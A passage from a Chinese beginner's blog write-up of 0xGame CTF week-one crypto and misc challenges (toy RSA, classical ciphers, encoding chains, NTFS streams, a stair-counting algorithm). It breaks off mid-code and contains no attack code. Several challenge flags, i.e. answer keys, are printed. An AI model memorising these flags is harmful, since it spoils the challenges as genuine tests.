<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css" integrity="sha256-Z1K5uhUaJXA7Ll0XrZ/0JhX4lAtZFpT6jkKrEDT0drU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.14.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="首次接触ctf本人菜鸡一个 我太难了 以下是本人第一周做出的题的题解">
<meta property="og:type" content="article">
<meta property="og:title" content="0xGame 第一周">
<meta property="og:url" content="http://example.com/2021/10/10/0xGame-%E7%AC%AC%E4%B8%80%E5%91%A8/index.html">
<meta property="og:site_name" content="sCh3n&#39;s Blog">
<meta property="og:description" content="首次接触ctf本人菜鸡一个 我太难了 以下是本人第一周做出的题的题解">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:\Users\schen\Downloads\Class8.png">
<meta property="article:published_time" content="2021-10-09T23:31:19.000Z">
<meta property="article:modified_time" content="2023-02-23T04:44:25.376Z">
<meta property="article:author" content="sCh3n">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\Users\schen\Downloads\Class8.png">


<link rel="canonical" href="http://example.com/2021/10/10/0xGame-%E7%AC%AC%E4%B8%80%E5%91%A8/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2021/10/10/0xGame-%E7%AC%AC%E4%B8%80%E5%91%A8/","path":"2021/10/10/0xGame-第一周/","title":"0xGame 第一周"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>0xGame 第一周 | sCh3n's Blog</title>
  






  <script async defer data-website-id="" src=""></script>

  <script defer data-domain="" src=""></script>

  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">sCh3n's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-friendlink"><a href="/friendlink/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto-ABC-Of-RSA"><span class="nav-number">1.</span> <span class="nav-text">Crypto    ABC Of RSA</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto-BlackGiveRSA"><span class="nav-number">2.</span> <span class="nav-text">Crypto    BlackGiveRSA</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto-Class8"><span class="nav-number">3.</span> <span class="nav-text">Crypto    Class8</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto-CuteCaesar"><span class="nav-number">4.</span> <span class="nav-text">Crypto    CuteCaesar</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto-manycode"><span class="nav-number">5.</span> <span class="nav-text">Crypto    manycode</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto-ezVigenere"><span class="nav-number">6.</span> <span class="nav-text">Crypto   ezVigenère</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto-MyFunction"><span class="nav-number">7.</span> <span class="nav-text">Crypto   MyFunction</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto-Sign-in"><span class="nav-number">8.</span> <span class="nav-text">Crypto Sign in</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-number">8.0.1.</span> <span class="nav-text"></span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Misc-%E7%BF%BB%E8%AF%91%E7%A8%BF"><span class="nav-number">9.</span> <span class="nav-text">Misc    翻译稿</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Misc-%E8%AE%A4%E7%9C%9F%E7%9A%84%E8%A1%80"><span class="nav-number">10.</span> <span class="nav-text">Misc    认真的血</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Misc-%E2%80%9C%E7%AE%80%E5%8D%95%E2%80%9D%E7%9A%84%E7%AE%97%E6%B3%95%E9%A2%98"><span class="nav-number">11.</span> <span class="nav-text">Misc “简单”的算法题</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="nav-number">11.0.0.1.</span> <span class="nav-text">思路：</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Pwn-ret2text"><span class="nav-number">12.</span> <span class="nav-text">Pwn    ret2text</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Pwn%EF%BC%9F%EF%BC%81"><span class="nav-number">13.</span> <span class="nav-text">Pwn？！</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#RE-our-Compilation-story"><span class="nav-number">14.</span> <span class="nav-text">RE    our Compilation story</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#RE-Signin-User-Friendly"><span class="nav-number">15.</span> <span class="nav-text">RE  Signin: User Friendly</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Web-robots"><span class="nav-number">16.</span> <span class="nav-text">Web    robots</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">sCh3n</p>
  <div class="site-description" itemprop="description">一个不入流摆狗密码手</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/10/10/0xGame-%E7%AC%AC%E4%B8%80%E5%91%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="sCh3n">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sCh3n's Blog">
      <meta itemprop="description" content="一个不入流摆狗密码手">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="0xGame 第一周 | sCh3n's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          0xGame 第一周
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-10-10 07:31:19" itemprop="dateCreated datePublished" datetime="2021-10-10T07:31:19+08:00">2021-10-10</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-02-23 12:44:25" itemprop="dateModified" datetime="2023-02-23T12:44:25+08:00">2023-02-23</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Crypto/" itemprop="url" rel="index"><span itemprop="name">Crypto</span></a>
        </span>
          ，
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Crypto/WriteUp/" itemprop="url" rel="index"><span itemprop="name">WriteUp</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>首次接触ctf本人菜鸡一个</p>
<p>我太难了</p>
<p>以下是本人第一周做出的题的题解</p>
<span id="more"></span>

<h1 id="Crypto-ABC-Of-RSA"><a href="#Crypto-ABC-Of-RSA" class="headerlink" title="Crypto    ABC Of RSA"></a>Crypto    ABC Of RSA</h1><p>由于写本题时还不知道密码学的那个包，于是直接写程序求解</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;math.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="type">long</span> <span class="type">long</span> <span class="type">int</span> p, q, fain, d=<span class="number">0</span>;</span><br><span class="line">	q=<span class="number">1175078221</span>; p=<span class="number">1435756429</span>;</span><br><span class="line">	fain=(q<span class="number">-1</span>)*(p<span class="number">-1</span>);</span><br><span class="line">	<span class="keyword">while</span>(<span class="number">1</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">if</span>(<span class="number">10007</span>*d%fain==<span class="number">1</span>)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">&quot;%d&quot;</span>, d);</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span> d++;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line"> &#125; </span><br></pre></td></tr></table></figure>

<p>解出结果包上0xGame{}提交</p>
<h1 id="Crypto-BlackGiveRSA"><a href="#Crypto-BlackGiveRSA" class="headerlink" title="Crypto    BlackGiveRSA"></a>Crypto    BlackGiveRSA</h1><p>hint中网页打开不知道干什么用</p>
<p>看附件</p>
<p>题中代码将flag分为6份每份7个字符，转换成long（记为m）</p>
<p>输出m的e次幂mod n</p>
<p>现在逆过来由输出（密文）求明文flag</p>
<p>把n的值输到网站得出两个质因数p和q</p>
<p>求d使得e*d mod （p-1）×（q-1）为1</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span>*</span><br><span class="line"><span class="built_in">print</span>（inverse（<span class="number">10007</span>，（p-<span class="number">1</span>）*（q-<span class="number">1</span>）））</span><br></pre></td></tr></table></figure>

<p>这样求出d的值</p>
<p>然后将output的密文一个个输进下面代码的c中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span>*</span><br><span class="line">d=<span class="number">1540111621310965943</span></span><br><span class="line">n=<span class="number">1687126110378632809</span></span><br><span class="line">c=</span><br><span class="line"><span class="built_in">print</span>(long_to_bytes(<span class="built_in">pow</span>(c,d,n)))</span><br></pre></td></tr></table></figure>

<p>将每次得到的结果拼接起来就是flag啦！</p>
<p>提交</p>
<h1 id="Crypto-Class8"><a href="#Crypto-Class8" class="headerlink" title="Crypto    Class8"></a>Crypto    Class8</h1><p><img src="C:\Users\schen\Downloads\Class8.png" alt="Class8"></p>
<p>搜索古典密码集合</p>
<p>找到了盲文密码，猪圈密码，摩斯密码，银河密码和培根密码，那么还剩下重复数字的那几个和cfgb</p>
<p>重复数字的那几个百度一下还是找到了正解，即9键对应键位，有几个重复数字就是第几个字母</p>
<p>还剩一个cfgb，其实一开始已经猜出了是26键键盘中4个字母包围的v</p>
<p>然而一开始太过无知把0x当成Ox导致错误</p>
<p>发现后再尝试发现还是不对，于是去试错</p>
<p>试了老半天还是不对于是找大佬问了问发现是小人密码的脚看错了！！！</p>
<p>低级错误，别跟我一样</p>
<p>提交flag</p>
<p>0xGame{CLASSLNRDDLDVTNB}</p>
<h1 id="Crypto-CuteCaesar"><a href="#Crypto-CuteCaesar" class="headerlink" title="Crypto    CuteCaesar"></a>Crypto    CuteCaesar</h1><p>下载附件打开懵逼</p>
<p>看一眼hint提示兽语，想起之前碰到与佛论禅，于是搜索找到相应的在线解码</p>
<p>输出格式不是0xgame，联想题目名，用凯撒替换，因格式已知，可以得知位移为3，解码，得到flag</p>
<h1 id="Crypto-manycode"><a href="#Crypto-manycode" class="headerlink" title="Crypto    manycode"></a>Crypto    manycode</h1><p>下载附件</p>
<p>看到颜文字懵逼，看hint搜CTF常见编码，找到js颜文字相应解码方式（chorm控制台用不来找了个在线解码）</p>
<p>解码出来发现还是乱码4A5645475153435A4B345957595A4A524B4A3347454D4A5A4F5249554F4E4A564C415A453235323249524844533D3D3D<br>;</p>
<p>看一眼字母没有超过F的，16进制有关，符合Hex编码的密文样式，在线解码</p>
<p>JVEGQSCZK4YWYZJRKJ3GEMJZORIUONJVLAZE2522IRHDS&#x3D;&#x3D;&#x3D;</p>
<p>三个等号这个我知道找到base32解码</p>
<p>MHhHYW1le1Rvb19tQG55X2MwZDN9</p>
<p>这个就看不太懂了，猜一个base64解码成功得到flag</p>
<p>0xGame{Too_m@ny_c0d3}</p>
<p>提交</p>
<h1 id="Crypto-ezVigenere"><a href="#Crypto-ezVigenere" class="headerlink" title="Crypto   ezVigenère"></a>Crypto   ezVigenère</h1><p>维吉尼亚密码没有key</p>
<p>百度一下，找到方法试了一遍无事发生改变思路</p>
<p>看到最后一行格式明显0yIang{iovesgsu1pg_Wkgfpesg}</p>
<p>根据yIang分别对应xGame可以发现密钥是bcabc是个循环</p>
<p>那么复制全文，密钥分别尝试bca，cab，abc（具体哪个不记得了）</p>
<p>解码得出flag，提交</p>
<h1 id="Crypto-MyFunction"><a href="#Crypto-MyFunction" class="headerlink" title="Crypto   MyFunction"></a>Crypto   MyFunction</h1><p>下载附件</p>
<p>看py代码得知我们把flag中逐个字符转为ASCII码（x）并算出x*lnx输出</p>
<p>那么就将结果逆过来（穷举x*lnx值并比对得出ASCII码）</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;math.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">	<span class="type">int</span> i = <span class="number">0</span>, j = <span class="number">0</span>;</span><br><span class="line">	<span class="type">double</span> f = <span class="number">0</span>;</span><br><span class="line">	<span class="type">int</span> <span class="built_in">list</span>[<span class="number">48</span>] = &#123; <span class="number">0</span> &#125;;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> (j = <span class="number">0</span>; j &lt; <span class="number">48</span>; j++) &#123;</span><br><span class="line">		scanf_s(<span class="string">&quot;%lf&quot;</span>, &amp;f);</span><br><span class="line">		<span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">1</span>; i &lt; <span class="number">128</span>; i++) &#123;</span><br><span class="line">			<span class="keyword">if</span> (<span class="built_in">fabs</span>(f - i * <span class="built_in">log</span>(i)) &lt; <span class="number">1</span>) &#123;</span><br><span class="line">				<span class="built_in">list</span>[j] = i;</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> (j = <span class="number">0</span>; j &lt; <span class="number">48</span>; j++) &#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span>, <span class="built_in">list</span>[j]);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>即可得到flag</p>
<h1 id="Crypto-Sign-in"><a href="#Crypto-Sign-in" class="headerlink" title="Crypto Sign in"></a>Crypto Sign in</h1><p>下载附件</p>
<p>打开后阅读到最后找到flag，提交</p>
<h3 id=""><a href="#" class="headerlink" title=""></a></h3><h1 id="Misc-翻译稿"><a href="#Misc-翻译稿" class="headerlink" title="Misc    翻译稿"></a>Misc    翻译稿</h1><p>把zip文件用winhex打开之后，替换14000900为14000000</p>
<p>打开docx文件，报错？先不管</p>
<p>ctrl+a复制到txt，看到了带&#x3D;&#x3D;&#x3D;的字符串</p>
<p>base32解码，得到一半flag</p>
<p>为找到另一半flag翻各种wp，直到看到docx后缀改为rar可以直接解压</p>
<p>照做，在文件夹里面找到一个HIddenBy 13.txt</p>
<p>打开一看是字符串带一个}</p>
<p>试了试直接合起来提交发现并不正确</p>
<p>想了想没什么编码是跟13有关系的</p>
<p>那就只能是凯撒位移了，解码，果然是有意义的那多半对了</p>
<p>合并，提交flag</p>
<h1 id="Misc-认真的血"><a href="#Misc-认真的血" class="headerlink" title="Misc    认真的血"></a>Misc    认真的血</h1><p>根据hint中的ntfs与题干中的流，找到这么一个软件：</p>
<p>NTFS stream editor</p>
<p>剩下的就简单了，把文件夹扔进去看到有个flag</p>
<p>导出这个txt，上面一行翻译过来是想让我玩杀手吗？？</p>
<p>不扯皮了，根据代号47想到rot47加密</p>
<p>那我们在线解个码，得到flag：0xGame{NTFS_B4sic_s7eg}</p>
<p>提交</p>
<h1 id="Misc-“简单”的算法题"><a href="#Misc-“简单”的算法题" class="headerlink" title="Misc “简单”的算法题"></a>Misc “简单”的算法题</h1><h4 id="思路："><a href="#思路：" class="headerlink" title="思路："></a>思路：</h4><p>对于四级之后（前三级特殊）的台阶，到达该台阶的方法数&#x3D;</p>
<p>​	到上级台阶方法数+上上级台阶方法数+上上上级台阶方法数</p>
<p>若该级台阶不可到达，则到该级台阶方法数为0</p>
<p>下面给出代码（c语言辣鸡瑟瑟发抖）</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// stair 是当前台阶级数</span></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">isBroken</span><span class="params">(<span class="type">int</span> stair, <span class="type">int</span> numberOfBrokenStairs, <span class="type">int</span> *listOfBrokenStairs)</span> </span>&#123;</span><br><span class="line">	<span class="keyword">if</span> (numberOfBrokenStairs == <span class="number">0</span>) &#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; numberOfBrokenStairs; i++) &#123;</span><br><span class="line">			<span class="keyword">if</span> (stair == listOfBrokenStairs[i]) &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">			&#125; </span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="type">char</span> c = <span class="number">0</span>;</span><br><span class="line">	<span class="type">int</span> numberOfStairs = <span class="number">0</span>; <span class="comment">// 楼梯级数</span></span><br><span class="line">	<span class="type">int</span> numberOfBrokenStairs = <span class="number">0</span>; <span class="comment">// 破坏楼梯级数</span></span><br><span class="line">	<span class="type">int</span> *listOfBrokenStairs = <span class="literal">NULL</span>; <span class="comment">// 破坏楼梯级数的数组指针</span></span><br><span class="line"></span><br><span class="line">	FILE* fl;</span><br><span class="line">	<span class="type">errno_t</span> err = <span class="built_in">fopen_s</span>(&amp;fl, <span class="string">&quot;testdata\\testdata10.in&quot;</span>, <span class="string">&quot;r&quot;</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (!err &amp;&amp; fl)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="comment">// 读取台阶总级数</span></span><br><span class="line">		<span class="keyword">while</span> ((c = <span class="built_in">fgetc</span>(fl)) != <span class="string">&#x27; &#x27;</span>) &#123;</span><br><span class="line">			numberOfStairs = numberOfStairs * <span class="number">10</span> + (c - <span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">		&#125; </span><br><span class="line"></span><br><span class="line">		<span class="comment">// 读取坏了的台阶的总级数</span></span><br><span class="line">		<span class="keyword">while</span> ((c = <span class="built_in">fgetc</span>(fl)) != <span class="string">&#x27;\n&#x27;</span>) &#123;</span><br><span class="line">			numberOfBrokenStairs = numberOfBrokenStairs * <span class="number">10</span> + (c - <span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">		&#125; </span><br><span class="line"></span><br><span class="line">		<span class="comment">// 读取坏了的台阶的级数</span></span><br><span class="line">		<span class="keyword">if</span> (numberOfBrokenStairs == <span class="number">0</span>) &#123;</span><br><span class="line">			;</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			listOfBrokenStairs = (<span class="type">int</span> *)<span class="built_in">malloc</span>(<span class="built_in">sizeof</span>(<span class="type">int</span>) * numberOfBrokenStairs);</span><br><span class="line">			<span class="keyword">if</span> (listOfBrokenStairs) &#123;</span><br><span class="line">				<span class="type">int</span> tempNumber = <span class="number">0</span>, s = <span class="number">0</span>;</span><br><span class="line">				<span class="keyword">while</span> ((c = <span class="built_in">fgetc</span>(fl)) != EOF) &#123;</span><br><span class="line">					<span class="keyword">if</span> (c &gt;= <span class="string">&#x27;0&#x27;</span> &amp;&amp; c &lt;= <span class="string">&#x27;9&#x27;</span>) &#123;</span><br><span class="line">						tempNumber = tempNumber * <span class="number">10</span> + (c - <span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">					&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">						listOfBrokenStairs[s] = tempNumber;</span><br><span class="line">						s++;</span><br><span class="line">						tempNumber = <span class="number">0</span>;</span><br><span class="line">					&#125;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		<span class="type">long</span> <span class="type">long</span> numberOfWays[<span class="number">4</span>] = &#123; <span class="number">0</span> &#125;; <span class="comment">// 根据上述思路，在每一级台阶均只需要考虑当前级和前三级。极大程度降低空间复杂度。</span></span><br><span class="line">		<span class="comment">// numberOfWays[0] [需要计算得到]当前台阶的到达方法数量</span></span><br><span class="line">		<span class="comment">//              1  前1级台阶的到达方法数量</span></span><br><span class="line">		<span class="comment">//              2    2</span></span><br><span class="line">		<span class="comment">//              3    3</span></span><br><span class="line"></span><br><span class="line">		<span class="comment">// 第1级台阶的特殊处理</span></span><br><span class="line">		<span class="keyword">if</span> (!<span class="built_in">isBroken</span>(<span class="number">1</span>, numberOfBrokenStairs, listOfBrokenStairs)) &#123;</span><br><span class="line">			numberOfWays[<span class="number">3</span>] = <span class="number">1</span>;</span><br><span class="line">		&#125; <span class="comment">// else numberOfWays[3] = 0, 与初值相同，省略。</span></span><br><span class="line"></span><br><span class="line">		<span class="comment">// 第2级台阶的特殊处理</span></span><br><span class="line">		<span class="keyword">if</span> 